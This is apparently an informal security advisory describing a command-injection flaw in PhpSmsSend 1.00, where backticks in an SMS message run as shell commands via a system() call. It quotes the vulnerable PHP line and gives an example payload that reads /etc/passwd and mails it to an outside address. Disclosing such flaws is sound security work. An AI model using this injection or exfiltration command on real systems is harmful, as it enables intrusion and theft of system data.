---[ PhpSmsSend remote execute commands bug
---[ About PhpSmsSend
PhpSmsSend is a frontend to the SmsSend application. It consists of a .php file, from which you select one of the available scripts, and then you can send an SMS wherever you want, all around the world.
PhpSmssend's website is http://zekiller.skytech.org/smssend.php
---[ Affected System
PhpSmsSystem Version 1.00
from file .php :
$str = SMSSEND." ".SCRIPTSPATH.$script." $params -- -d 0 ".PROXY; system($str,$res);
if the sms messages contain a backtick "`" then inside of backtick will be execute as a system command.
the result of the command will send via sms :), so the command output should be less than 160 characters to send via sms, but if the command using pipe (ex : cat /etc/passwd|mail email@example.com) or redirection then the messages status is successfully :)
my Guru GaniSalman, my friend OpsCrew, #indoSniffing and
(lug.stikom.edu), and the gauli.com owner